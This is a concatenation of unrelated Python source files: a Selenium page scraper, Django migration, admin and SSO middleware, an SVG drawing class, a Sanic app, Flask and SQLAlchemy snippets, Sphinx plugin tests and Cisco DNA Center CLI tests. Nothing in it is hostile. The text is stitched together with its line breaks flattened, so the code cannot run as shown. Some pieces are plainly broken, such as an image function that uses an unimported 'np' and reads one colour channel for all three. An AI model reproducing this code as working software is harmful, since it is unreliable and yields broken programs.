from bs4 import BeautifulSoup from selenium import webdriver from selenium.webdriver.firefox.options import Options from time import sleep options = Options() options.headless = True url = 'http://www.duksung.ac.kr/diet/schedule.do?menuId=1151' driver = webdriver.Firefox(options=options) driver.get(url) driver.implicitly_wait(5) sleep(3) html = driver.page_source out_fp = open('page.html', 'w', encoding='utf-8') out_fp.write(html) out_fp.close() driver.close()
# Generated by Django 2.1.2 on 2018-10-20 11:16 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('twitmining', '0020_auto_20181020_0936'), ] operations = [ migrations.AddField( model_name='query', name='language', field=models.CharField(default='DEFAULT VALUE', max_length=100), ), ]
import re from django.conf import settings from django.contrib.auth.decorators import login_required from .backends import AzureADBackend import logging logger = logging.getLogger(__name__) # TODO manage for rest_framework, daphne class SSORequireLoginMiddleware(object): """ Add login_required decorator to all views except 3 urls - Login/ Callback and Logout Redirect Url """ def __init__(self, get_response): self.get_response = get_response self.required = tuple(re.compile(url) for url in (r"/(.*)$",)) self.exceptions = tuple(re.compile( r"^/" + url.strip("/") + "[/]?$") for url in ( AzureADBackend.LOGIN_URL, AzureADBackend.REDIRECT_URI, AzureADBackend.POST_LOGOUT_REDIRECT_URI, ) if url) def __call__(self, request): # Code to be executed for each request before # the view (and later middleware) are called. response = self.get_response(request) # Code to be executed for each request/response after # the view is called. return response def process_view(self, request, view_func, view_args, view_kwargs): # No need to process URLs if user already logged in if request.user.is_authenticated: return None # An exception match should immediately return None for url in self.exceptions: if url.match(request.path): return None # Requests matching a restricted URL pattern are returned # wrapped with the login_required decorator for url in self.required: if url.match(request.path): return login_required(view_func)(request, *view_args, **view_kwargs) # Explicitly return None for all non-matching requests return None # def process_exception(self, request, exception): # None or HttpResponse() # def process_template_response(self, request, response): # response.context_data['key'] = 'value' # return response
#!/usr/bin/env python """ Module containing Svg class and helper functions """ import math from lxml import etree def json_to_style(json): """ convert a json to a string formated as style argument { a : "b", c : "d" } -> "a:b;c:d;" """ style_argument = "" for attribute, value in json.items(): style_argument = style_argument + attribute + ":" + value + ";" return style_argument class Svg(object): """ Class managing SVG elements via lxml.etree """ def __init__(self, root=None, width=0, height=0, id_name="svg_element"): if root is None: self.root = etree.Element("svg", {"width": str(width), "height": str(height), "id": id_name }) else: self.root = root def create_subgroup( self, group_id, class_name=None, additional_arguments=None): """ create a subgroup in root and return it """ arguments = {'id': str(group_id)} if class_name is not None: arguments['class'] = str(class_name) if additional_arguments is not None: arguments.update(additional_arguments) group = etree.SubElement(self.root, 'g', arguments) return Svg(group) def create_ellipse( self, radius, center, stroke_colour, id_name, fill=None, stroke_width="1", stroke_opacity="0.5", opacity="1"): """ Create an ellipse in root and return it """ (radius_x, radius_y) = radius (center_x, center_y) = center style = { 'stroke': stroke_colour, 'stroke-width': str(stroke_width), 'stroke-opacity': str(stroke_opacity), } if fill is not None: style['fill'] = fill style['opacity'] = str(opacity) ell_attribs = { 'style': json_to_style(style), 'cx': str(center_x), 'cy': str(center_y), 'rx': str(radius_x), 'ry': str(radius_y), 'id': str(id_name) } ellipse = etree.SubElement(self.root, 'ellipse', ell_attribs) return Svg(ellipse) def create_hex( self, id_name, center, coordinates, hex_size, fill_colour, class_name, fill_opacity="0.5", stroke_colour='#FFFFFF', stroke_width="1", enableOnClick=False, onclick="clickHex(this)", stroke_opacity="1"): """ Create a hex in root and return it """ (center_x, center_y) = center (coord_q, coord_r) = coordinates hex_width = float(2 * hex_size) hex_height = math.sqrt(3) * hex_size points = [ [center_x - hex_width / 4, center_y - hex_height / 2], [center_x + hex_width / 4, center_y - hex_height / 2], [center_x + hex_width / 2, center_y], [center_x + hex_width / 4, center_y + hex_height / 2], [center_x - hex_width / 4, center_y + hex_height / 2], [center_x - hex_width / 2, center_y] ] str_points = "" for point in points: str_points = str_points + str(point[0]) + "," + str(point[1]) + " " style = { 'stroke': stroke_colour, 'stroke-width': str(stroke_width), 'stroke-opacity': str(stroke_opacity), 'fill': fill_colour, 'fill-opacity': str(fill_opacity) } ell_attribs = { 'style': json_to_style(style), 'points': str_points, 'id': str(id_name), 'coord_q': str(coord_q), 'coord_r': str(coord_r), 'class': class_name } if enableOnClick: ell_attribs['onclick'] = onclick hex_element = etree.SubElement(self.root, 'polygon', ell_attribs) return Svg(hex_element) def create_text( self, id_name, position, content, font_size=8, font_colour="#000000", text_align="center", text_anchor="middle", font_weight="normal"): """ Create a text in root and return it """ (position_x, position_y) = position style = { 'text-align': text_align, 'text-anchor': text_anchor, 'font-size': str(font_size) + "pt" } attributes = { 'style': json_to_style(style), 'x': str(position_x), 'y': str(position_y), 'fill': font_colour, 'font-weight': font_weight, 'id': id_name } text = etree.SubElement(self.root, 'text', attributes) text.text = content return Svg(text) def create_rectangle( self, position, size, id_name, fill_colour=None, stroke_colour=None, stroke_width=None, fill_opacity=None, additional_arguments=None): """ Create a rectangle in root and return it """ (position_x, position_y) = position (size_width, size_height) = size if additional_arguments is None: additional_arguments = {} style = {} if fill_colour: style['fill'] = fill_colour if stroke_colour: style['stroke'] = stroke_colour if stroke_width: style['stroke-width'] = str(stroke_width) if fill_opacity: style['fill-opacity'] = str(fill_opacity) arguments = { 'style': json_to_style(style), 'id': id_name, 'width': str(size_width), 'height': str(size_height), 'x': str(position_x), 'y': str(position_y), } for attribute, value in additional_arguments.items(): arguments[attribute] = value rect = etree.SubElement(self.root, 'rect', arguments) return Svg(rect) def create_circle(self, center, radius, id_name, fill_colour=None, additional_arguments=None): """ Create a circle in root and return it """ (center_x, center_y) = center if additional_arguments is None: additional_arguments = {} arguments = { 'id': id_name, 'cx': str(center_x), 'cy': str(center_y), 'r': str(radius) } if fill_colour is not None: arguments["style"] = "fill:" + fill_colour for attribute, value in additional_arguments.items(): arguments[attribute] = value circle = etree.SubElement(self.root, 'circle', arguments) return Svg(circle) def create_line(self, position_start, position_end, stroke_colour="#000000", stroke_width="1"): """ create a line in root and return it """ (start_x, start_y) = position_start (end_x, end_y) = position_end style = { 'stroke': stroke_colour, 'stroke-width': str(stroke_width) } arguments = { 'x1': str(start_x), 'x2': str(end_x), 'y1': str(start_y), 'y2': str(end_y), 'style': json_to_style(style) } line = etree.SubElement(self.root, 'line', arguments) return Svg(line) def create_path(self, commands, stroke_colour=None, fill_colour=None, id_name=None, additional_arguments=None): """ create a path in root and return it """ arguments = { 'd': commands } if stroke_colour is not None: arguments["stroke"] = stroke_colour if fill_colour is not None: arguments["fill"] = fill_colour if id_name is not None: arguments['id'] = id_name if additional_arguments is not None: arguments.update(additional_arguments) path = etree.SubElement(self.root, 'path', arguments) return Svg(path) def create_polygon(self, points, fill_colour=None, stroke_colour=None): """ create a polygon in root and return it """ arguments = { 'points': points } style = {} if fill_colour is not None: style['fill'] = fill_colour if stroke_colour is not None: style['stroke'] = stroke_colour arguments['style'] = json_to_style(style) polygon = etree.SubElement(self.root, 'polygon', arguments) return Svg(polygon) def use_symbol(self, symbol_name, id_name, position=None, fill_colour=None, additional_arguments=None): """use a symbol which had to be defined earlier Arguments: symbol_name {string} -- name of the symbol id_name {string} -- id position {(int, int)} -- (x, y) (default: {None}) Keyword Arguments: fill_colour {string} -- colour (default: {None}) additional_arguments {json} -- any additional arguments (default: {None}) """ if additional_arguments is None: additional_arguments = {} arguments = { 'href': '#' + symbol_name, 'id': id_name } if position is not None: (position_x, position_y) = position arguments['x'] = str(position_x) arguments['y'] = str(position_y) if fill_colour is not None: arguments["style"] = json_to_style({'fill': fill_colour}) for attribute, value in additional_arguments.items(): arguments[attribute] = value symbol = etree.SubElement(self.root, 'use', arguments) return Svg(symbol) def create_image(self, image_name, width, height, x_pos, y_pos): """ Create an image in root and return it. """ image = etree.SubElement(self.root, 'image', { 'href': image_name, 'width': width, 'height': height, 'x': x_pos, 'y': y_pos}) image.text = " " return Svg(image) def create_scoring_track(self, size_box, subgroup_name, x_elements, y_elements, grey_element, fill_colour="#FFFFFF", font_size=8, additional_arguments=None): """ create the whole scoring track """ if additional_arguments is None: additional_arguments = {} layer = self.create_subgroup(subgroup_name) for i in range(0, x_elements + 1): layer.draw_scoring_box( (i*size_box, 0), (size_box, size_box), "{}_{}".format(subgroup_name, i), i, grey_element, fill_colour, font_size, additional_arguments ) for i in range(x_elements, x_elements + y_elements + 1): layer.draw_scoring_box( (x_elements*size_box, (i - x_elements)*size_box), (size_box, size_box), "{}_{}".format(subgroup_name, i), i, grey_element, fill_colour, font_size, additional_arguments ) for i in range(x_elements + y_elements, 2*x_elements + y_elements + 1): layer.draw_scoring_box( ((2*x_elements + y_elements - i)*size_box, y_elements*size_box), (size_box, size_box), "{}_{}".format(subgroup_name, i), i, grey_element, fill_colour, font_size, additional_arguments ) for i in range(2*x_elements + y_elements, 2*x_elements + 2*y_elements): layer.draw_scoring_box( (0, (2*x_elements + 2*y_elements - i)*size_box), (size_box, size_box), "{}_{}".format(subgroup_name, i), i, grey_element, fill_colour, font_size, additional_arguments ) def draw_scoring_box(self, position, size, id_name, number, grey_element, fill_colour="#FFFFFF", font_size=8, additional_arguments=None): """ draw one box of the scoring track """ if additional_arguments is None: additional_arguments = {} additional_arguments["value"] = str(number) (position_x, position_y) = position (width, height) = size self.create_rectangle((position_x, position_y), (width, height), id_name, fill_colour=fill_colour, stroke_colour="#000000", stroke_width=1, fill_opacity=1, additional_arguments=additional_arguments) if number % grey_element == 0: self.create_rectangle( [position_x, position_y], size, "{}_transperent".format(id_name), fill_colour="black", fill_opacity="0.4" ) self.create_text( id_name, (position_x + width / 2, position_y + height / 2 + font_size / 2), str(number), font_size=font_size ) def get_string(self): """ return root element converted to string """ return etree.tostring(self.root, pretty_print=True).decode('utf-8') def __str__(self): return self.get_string() def get_position(size, x_elements, y_elements, points, stack_position): """ given the points and the number of markers below in the stack return the position where to print the marker """ POSITION_LOWEST_DISC = 15 space = points % (2*(x_elements+y_elements)) if 0 <= space <= x_elements: x_pos = space * size y_pos = POSITION_LOWEST_DISC elif x_elements < space <= x_elements + y_elements: x_pos = x_elements * size y_pos = POSITION_LOWEST_DISC + (space - x_elements) * size elif x_elements + y_elements < space <= 2*x_elements + y_elements: x_pos = (2*x_elements + y_elements - space) * size y_pos = POSITION_LOWEST_DISC + y_elements*size elif 2*x_elements + y_elements < space < 2*x_elements + 2*y_elements: x_pos = 0 y_pos = POSITION_LOWEST_DISC + \ (2*x_elements + 2*y_elements - space) * size return [x_pos, y_pos - 4*stack_position] def main(): """ no main implemented """ print("no main implemented") if __name__ == '__main__': main()
def compute(a, b, c, d, e): print(e) tmp = a + b if 1 and 2: tmp *= 2 return tmp __transonic__ = ("0.3.0.post0",)
#!/usr/bin/env python #import moveit_commander #from geometry_msgs.msg import Pose, Quaternion #from tf.transformations import quaternion_from_euler import time import cv2 #group= moveit_commander.MoveGroupCommander("arm") #ps = Pose() #img = cv2.imread("./test.png") #print ("img shape: ", img.shape) # 217, 403 def img_2_csv(): img = cv2.imread("./test.png") # shape = (217, 403, 3) -> 21.7 cm, 40.3 cm, rgb 3 colors shape = img.shape new_shape = (int(shape[0]/10), int(shape[1]/10), 3) print (new_shape) new_img = np.zeros(new_shape) tmp_total_r = 0 tmp_total_g = 0 tmp_total_b = 0 for i in range(0, new_shape[0]): for j in range(0, new_shape[1]): for w in range(0, 10): for h in range(0, 10): tmp_total_r += img[i*10+w, j*10+h, 0] tmp_total_g += img[i*10+w, j*10+h, 0] tmp_total_b += img[i*10+w, j*10+h, 0] tmp_total_r = int(tmp_total_r / 100) tmp_total_g = int(tmp_total_g / 100) tmp_total_b = int(tmp_total_b / 100) #new_img[] if __name__ == "__main__": img_2_csv()
# Copyright 2018 BLEMUNDSBURY AI LIMITED # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from typing import Union from sanic import Sanic from logging import info from cape_webservices.configuration.configuration_core import configuration_endpoints from cape_webservices.errors.errors_core import errors_endpoints from cape_webservices.app.app_core import app_endpoints from cape_webservices.app.app_annotation_endpoints import app_annotation_endpoints from cape_webservices.app.app_document_endpoints import app_document_endpoints from cape_webservices.app.app_saved_reply_endpoints import app_saved_reply_endpoints from cape_webservices.app.app_inbox_endpoints import app_inbox_endpoints from cape_webservices.app.app_user_endpoints import app_user_endpoints from cape_webservices import webservices_settings app = Sanic(__name__) app.blueprint(app_endpoints) app.blueprint(app_annotation_endpoints) app.blueprint(app_document_endpoints) app.blueprint(app_saved_reply_endpoints) app.blueprint(app_inbox_endpoints) app.blueprint(app_user_endpoints) app.blueprint(errors_endpoints) app.blueprint(configuration_endpoints) app.static('/', file_or_directory=webservices_settings.STATIC_FOLDER) app.static('/', file_or_directory=webservices_settings.HTML_INDEX_STATIC_FILE) # Import plugins if they're installed enabled_plugins = [] try: from cape_facebook_plugin.facebook_auth import facebook_auth_endpoints from cape_facebook_plugin.facebook_events import facebook_event_endpoints app.blueprint(facebook_auth_endpoints) app.blueprint(facebook_event_endpoints) enabled_plugins.append('facebook') info('Facebook plugin enabled') except ImportError: info('Facebook plugin disabled') try: from cape_hangouts_plugin.hangouts_events import hangouts_event_endpoints app.blueprint(hangouts_event_endpoints) enabled_plugins.append('hangouts') info('Hangouts plugin enabled') except ImportError: info('Hangouts plugin disabled') try: from cape_slack_plugin.slack_auth import slack_auth_endpoints from cape_slack_plugin.slack_events import slack_event_endpoints app.blueprint(slack_auth_endpoints) app.blueprint(slack_event_endpoints) enabled_plugins.append('slack') info('Slack plugin enabled') except ImportError: info('Slack plugin disabled') try: from cape_email_plugin.email_events import email_event_endpoints app.blueprint(email_event_endpoints) enabled_plugins.append('email') info('Email plugin enabled') except ImportError as e: print(e) info('Email plugin disabled') app.config.update(webservices_settings.WEBAPP_CONFIG) info(f"List of active endpoints { app.router.routes_all.keys() }") def run(port: Union[None, int] = None): if port is not None: webservices_settings.CONFIG_SERVER['port'] = int(port) info("Using port: %d", webservices_settings.CONFIG_SERVER['port']) app.config.LOGO = None app.run(**webservices_settings.CONFIG_SERVER)
from django.contrib import admin # Register your models here. from .models import UserProfile @admin.register(UserProfile) class UserProfileAdmin(admin.ModelAdmin): list_display = ('user', 'display_location', 'date_joined', 'updated_on')
from flask import request from flask_restful import Resource from apps.models.user_package.schema.user_schema import UserSchema from apps.models.user_package.user.user_model import User from mongoengine.errors import FieldDoesNotExist from apps.responses.responses import resp_exception, resp_ok from ..utils.user_utils import get_user_by_id class AdminSearchUser(Resource): def get(self, user_id): result = None user = None schema = UserSchema(many=False) user = get_user_by_id(user_id) result = schema.dump(user) return resp_ok( 'Users', 'Usuário encontrado', date=result.data )
from sqlalchemy import * from . import Base class FITest(Base): __tablename__ = 'test' id = Column(Integer, primary_key=True) uuid = Column(String(255), index=True) created_at = Column(DateTime) updated_at = Column(DateTime) def __repr__(self): return '<FITest(id={}, uuid={}, created_at={})>'.format(self.id, self.uuid, self.created_at)
import dectate from kaybee.plugins.genericpage.genericpage import Genericpage from kaybee.plugins.genericpage.handlers import ( initialize_genericpages_container, add_genericpage, genericpage_into_html_context, dump_settings, ) class TestGenericpagesContainer: def test_import(self): assert 'initialize_genericpages_container' == \ initialize_genericpages_container.__name__ def test_result(self, genericpages_kb_app, sphinx_app, sphinx_env): initialize_genericpages_container(genericpages_kb_app, sphinx_app, sphinx_env, []) assert hasattr(sphinx_app.env, 'genericpages') class TestGenericpagesAdd: def test_import(self): assert 'add_genericpage' == \ add_genericpage.__name__ def test_noadd_genericpage(self, genericpages_kb_app, genericpages_sphinx_app, foo_doctree): # We have a resource for this docname, don't make add genericpage genericpages_sphinx_app.env.resources = dict( foo=dict() ) result = add_genericpage(genericpages_kb_app, genericpages_sphinx_app, foo_doctree) assert None is result def test_add_genericpage(self, genericpages_kb_app, genericpages_sphinx_app, foo_doctree, valid_gp): genericpages_sphinx_app.env.resources = dict( no_foo=dict() ) genericpages_sphinx_app.genericpages = dict() dectate.commit(genericpages_kb_app) result = add_genericpage(genericpages_kb_app, genericpages_sphinx_app, foo_doctree) assert valid_gp == result.__class__ assert 'foo' == result.docname assert 'foo' in genericpages_sphinx_app.env.genericpages class TestGenericpageIntoHtml: def test_import(self): assert 'genericpage_into_html_context' == \ genericpage_into_html_context.__name__ def test_has_resource(self, genericpages_kb_app, genericpages_sphinx_app, sample_resources): index = sample_resources['index'] genericpages_sphinx_app.env.resources = {index.docname: index} pagename = index.docname templatename = '' context = dict() doctree = dict() result = genericpage_into_html_context( genericpages_kb_app, genericpages_sphinx_app, pagename, templatename, context, doctree ) assert {} == context def test_has_gp(self, genericpages_kb_app, genericpages_sphinx_app, sample_resources): index = sample_resources['index'] genericpages_sphinx_app.env.resources = {index.docname: index} about = Genericpage('r1/r2/about') genericpages_sphinx_app.env.genericpages = {about.docname: about} pagename = about.docname templatename = '' context = dict() doctree = dict() result = genericpage_into_html_context( genericpages_kb_app, genericpages_sphinx_app, pagename, templatename, context, doctree ) assert 'genericpage' in context assert 'page.html' == result['templatename'] def test_not_has_gp(self, genericpages_kb_app, genericpages_sphinx_app, sample_resources): index = sample_resources['index'] genericpages_sphinx_app.env.resources = {index.docname: index} about = Genericpage('r1/r2/about') genericpages_sphinx_app.env.genericpages = {} pagename = about.docname templatename = '' context = dict() doctree = dict() result = genericpage_into_html_context( genericpages_kb_app, genericpages_sphinx_app, pagename, templatename, context, doctree ) assert 'genericpage' not in context assert None is result class TestPluginGenerateDebugEvent: def test_import(self): assert 'dump_settings' == dump_settings.__name__ def test_debug(self, genericpages_kb_app, sphinx_env, valid_gps): sphinx_env.resources = dict( foo=dict() ) sphinx_env.genericpages = dict( foo=Genericpage('foo') ) genericpages = dump_settings(genericpages_kb_app, sphinx_env) assert 'genericpages' in genericpages config = genericpages['genericpages']['config'] assert 10 in config values = genericpages['genericpages']['values'] assert 1 == len(values) assert 'foo' == values['foo']['docname']
# -*- coding: utf-8 -*- """DNACenterAPI Network Settings API fixtures and tests. Copyright (c) 2019 Cisco and/or its affiliates. Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ import click import pytest from json import loads from tests.environment import DNA_CENTER_VERSION pytestmark = pytest.mark.skipif(DNA_CENTER_VERSION != '1.3.3', reason='version does not match') def is_valid_update_global_pool(result): data = result.output.strip() return True if data else False @pytest.mark.network_settings def test_update_global_pool(runner, cli, auth_options): result = runner.invoke(cli, ['-v', '1.3.3', *auth_options, 'network-settings', 'update-global-pool', """--active_validation=True""", """--payload=None""", """--settings='{"ippool": [{"ipPoolName": "string", "gateway": "string", "dhcpServerIps": ["string"], "dnsServerIps": ["string"], "id": "string"}]}'"""]) assert not result.exception assert is_valid_update_global_pool(result) def is_valid_delete_device_credential(result): data = result.output.strip() return True if data else False @pytest.mark.network_settings def test_delete_device_credential(runner, cli, auth_options): result = runner.invoke(cli, ['-v', '1.3.3', *auth_options, 'network-settings', 'delete-device-credential', """--id='string'"""]) assert not result.exception assert is_valid_delete_device_credential(result) def is_valid_assign_credential_to_site(result): data = result.output.strip() return True if data else False @pytest.mark.network_settings def test_assign_credential_to_site(runner, cli, auth_options): result = runner.invoke(cli, ['-v', '1.3.3', *auth_options, 'network-settings', 'assign-credential-to-site', """--active_validation=True""", """--cliid='string'""", """--httpread='string'""", """--httpwrite='string'""", """--payload=None""", """--site_id='string'""", """--snmpv2readid='string'""", """--snmpv2writeid='string'""", """--snmpv3id='string'"""]) assert not result.exception assert is_valid_assign_credential_to_site(result) def is_valid_get_network(result): data = result.output.strip() return True if data else False @pytest.mark.network_settings def test_get_network(runner, cli, auth_options): result = runner.invoke(cli, ['-v', '1.3.3', *auth_options, 'network-settings', 'get-network', """--site_id='string'"""]) assert not result.exception assert is_valid_get_network(result) def is_valid_delete_sp_profile(result): data = result.output.strip() return True if data else False @pytest.mark.network_settings def test_delete_sp_profile(runner, cli, auth_options): result = runner.invoke(cli, ['-v', '1.3.3', *auth_options, 'network-settings', 'delete-sp-profile', """--sp_profile_name='string'"""]) assert not result.exception assert is_valid_delete_sp_profile(result) def is_valid_update_sp_profile(result): data = result.output.strip() return True if data else False @pytest.mark.network_settings def test_update_sp_profile(runner, cli, auth_options): result = runner.invoke(cli, ['-v', '1.3.3', *auth_options, 'network-settings', 'update-sp-profile', """--active_validation=True""", """--payload=None""", """--settings='{"qos": [{"profileName": "string", "model": "string", "wanProvider": "string", "oldProfileName": "string"}]}'"""]) assert not result.exception assert is_valid_update_sp_profile(result) def is_valid_delete_global_ip_pool(result): data = result.output.strip() return True if data else False @pytest.mark.network_settings def test_delete_global_ip_pool(runner, cli, auth_options): result = runner.invoke(cli, ['-v', '1.3.3', *auth_options, 'network-settings', 'delete-global-ip-pool', """--id='string'"""]) assert not result.exception assert is_valid_delete_global_ip_pool(result) def is_valid_update_device_credentials(result): data = result.output.strip() return True if data else False @pytest.mark.network_settings def test_update_device_credentials(runner, cli, auth_options): result = runner.invoke(cli, ['-v', '1.3.3', *auth_options, 'network-settings', 'update-device-credentials', """--active_validation=True""", """--payload=None""", """--settings='{"cliCredential": {"description": "string", "username": "string", "password": "string", "enablePassword": "string", "id": "string"}, "snmpV2cRead": {"description": "string", "readCommunity": "string", "id": "string"}, "snmpV2cWrite": {"description": "string", "writeCommunity": "string", "id": "string"}, "snmpV3": {"authPassword": "string", "authType": "string", "snmpMode": "string", "privacyPassword": "string", "privacyType": "string", "username": "string", "description": "string", "id": "string"}, "httpsRead": {"name": "string", "username": "string", "password": "string", "port": "string", "id": "string"}, "httpsWrite": {"name": "string", "username": "string", "password": "string", "port": "string", "id": "string"}}'"""]) assert not result.exception assert is_valid_update_device_credentials(result) def is_valid_update_network(result): data = result.output.strip() return True if data else False @pytest.mark.network_settings def test_update_network(runner, cli, auth_options): result = runner.invoke(cli, ['-v', '1.3.3', *auth_options, 'network-settings', 'update-network', """--active_validation=True""", """--payload=None""", """--settings='{"dhcpServer": ["string"], "dnsServer": {"domainName": "can only contain alphanumeric characters or hyphen", "primaryIpAddress": "valid range : 1.0.0.0 - 223.255.255.255", "secondaryIpAddress": "valid range : 1.0.0.0 - 223.255.255.255"}, "syslogServer": {"ipAddresses": ["string"], "configureDnacIP": true}, "snmpServer": {"ipAddresses": ["string"], "configureDnacIP": true}, "netflowcollector": {"ipAddress": "string", "port": 0}, "ntpServer": ["string"], "timezone": "string", "messageOfTheday": {"bannerMessage": "string", "retainExistingBanner": true}, "network_aaa": {"servers": "Server type supported by ISE and AAA", "ipAddress": "Mandatory for ISE servers and for AAA consider this as additional Ip.", "network": "For AAA server consider it as primary IP and For ISE consider as Network", "protocol": "string", "sharedSecret": "Supported only by ISE servers"}, "clientAndEndpoint_aaa": {"servers": "string", "ipAddress": "Mandatory for ISE servers.", "network": "string", "protocol": "string", "sharedSecret": "Supported only by ISE servers"}}'""", """--site_id='string'"""]) assert not result.exception assert is_valid_update_network(result) def is_valid_get_service_provider_details(result): data = result.output.strip() return True if data else False @pytest.mark.network_settings def test_get_service_provider_details(runner, cli, auth_options): result = runner.invoke(cli, ['-v', '1.3.3', *auth_options, 'network-settings', 'get-service-provider-details', """--"""]) assert not result.exception assert is_valid_get_service_provider_details(result) def is_valid_get_device_credential_details(result): data = result.output.strip() return True if data else False @pytest.mark.network_settings def test_get_device_credential_details(runner, cli, auth_options): result = runner.invoke(cli, ['-v', '1.3.3', *auth_options, 'network-settings', 'get-device-credential-details', """--site_id='string'"""]) assert not result.exception assert is_valid_get_device_credential_details(result) def is_valid_create_sp_profile(result): data = result.output.strip() return True if data else False @pytest.mark.network_settings def test_create_sp_profile(runner, cli, auth_options): result = runner.invoke(cli, ['-v', '1.3.3', *auth_options, 'network-settings', 'create-sp-profile', """--active_validation=True""", """--payload=None""", """--settings='{"qos": [{"profileName": "string", "model": "string", "wanProvider": "string"}]}'"""]) assert not result.exception assert is_valid_create_sp_profile(result) def is_valid_get_global_pool(result): data = result.output.strip() return True if data else False @pytest.mark.network_settings def test_get_global_pool(runner, cli, auth_options): result = runner.invoke(cli, ['-v', '1.3.3', *auth_options, 'network-settings', 'get-global-pool', """--limit='string'""", """--offset='string'"""]) assert not result.exception assert is_valid_get_global_pool(result) def is_valid_create_network(result): data = result.output.strip() return True if data else False @pytest.mark.network_settings def test_create_network(runner, cli, auth_options): result = runner.invoke(cli, ['-v', '1.3.3', *auth_options, 'network-settings', 'create-network', """--active_validation=True""", """--payload=None""", """--settings='{"dhcpServer": ["string"], "dnsServer": {"domainName": "can only contain alphanumeric characters or hyphen", "primaryIpAddress": "valid range : 1.0.0.0 - 223.255.255.255", "secondaryIpAddress": "valid range : 1.0.0.0 - 223.255.255.255"}, "syslogServer": {"ipAddresses": ["string"], "configureDnacIP": true}, "snmpServer": {"ipAddresses": ["string"], "configureDnacIP": true}, "netflowcollector": {"ipAddress": "string", "port": 0}, "ntpServer": ["string"], "timezone": "string", "messageOfTheday": {"bannerMessage": "string", "retainExistingBanner": true}, "network_aaa": {"servers": "Server type supported by ISE and AAA", "ipAddress": "Mandatory for ISE servers and for AAA consider this as additional Ip.", "network": "For AAA server consider it as primary IP and For ISE consider as Network", "protocol": "string", "sharedSecret": "Supported only by ISE servers"}, "clientAndEndpoint_aaa": {"servers": "string", "ipAddress": "Mandatory for ISE servers.", "network": "string", "protocol": "string", "sharedSecret": "Supported only by ISE servers"}}'""", """--site_id='string'"""]) assert not result.exception assert is_valid_create_network(result) def is_valid_create_device_credentials(result): data = result.output.strip() return True if data else False @pytest.mark.network_settings def test_create_device_credentials(runner, cli, auth_options): result = runner.invoke(cli, ['-v', '1.3.3', *auth_options, 'network-settings', 'create-device-credentials', """--active_validation=True""", """--payload=None""", """--settings='{"cliCredential": [{"description": "string", "username": "string", "password": "string", "enablePassword": "string"}], "snmpV2cRead": [{"description": "string", "readCommunity": "string"}], "snmpV2cWrite": [{"description": "string", "writeCommunity": "string"}], "snmpV3": [{"description": "string", "username": "string", "privacyType": "AES128", "privacyPassword": "string", "authType": "SHA", "authPassword": "string", "snmpMode": "AUTHPRIV"}], "httpsRead": [{"name": "string", "username": "string", "password": "string", "port": 0}], "httpsWrite": [{"name": "string", "username": "string", "password": "string", "port": 0}]}'"""]) assert not result.exception assert is_valid_create_device_credentials(result) def is_valid_create_global_pool(result): data = result.output.strip() return True if data else False @pytest.mark.network_settings def test_create_global_pool(runner, cli, auth_options): result = runner.invoke(cli, ['-v', '1.3.3', *auth_options, 'network-settings', 'create-global-pool', """--active_validation=True""", """--payload=None""", """--settings='{"ippool": [{"ipPoolName": "string", "type": "Generic", "ipPoolCidr": "string", "gateway": "string", "dhcpServerIps": ["string"], "dnsServerIps": ["string"], "IpAddressSpace": "IPv6 or IPv4"}]}'"""]) assert not result.exception assert is_valid_create_global_pool(result)
#!/usr/bin/env/python3 # # Copyright (c) Facebook, Inc. and its affiliates. # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Pipeline Base Executor class.""" import abc import logging from six import with_metaclass class BaseExecutor(with_metaclass(abc.ABCMeta, object)): # pylint: disable=R0903 """Pipeline Base Executor abstract class.""" def __init__(self): pass # pylint: disable=W0107 @abc.abstractmethod def Do(self, input_dict: dict, output_dict: dict, exec_properties: dict): # pylint: disable=C0103 """A Do function that does nothing.""" pass # pylint: disable=W0107 def _log_startup( self, input_dict: dict, output_dict: dict, exec_properties ): """Log inputs, outputs, and executor properties in a standard format.""" class_name = self.__class__.__name__ logging.debug("Starting %s execution.", class_name) logging.debug("Inputs for %s are: %s .", class_name, input_dict) logging.debug("Outputs for %s are: %s.", class_name, output_dict) logging.debug( "Execution Properties for %s are: %s", class_name, exec_properties)
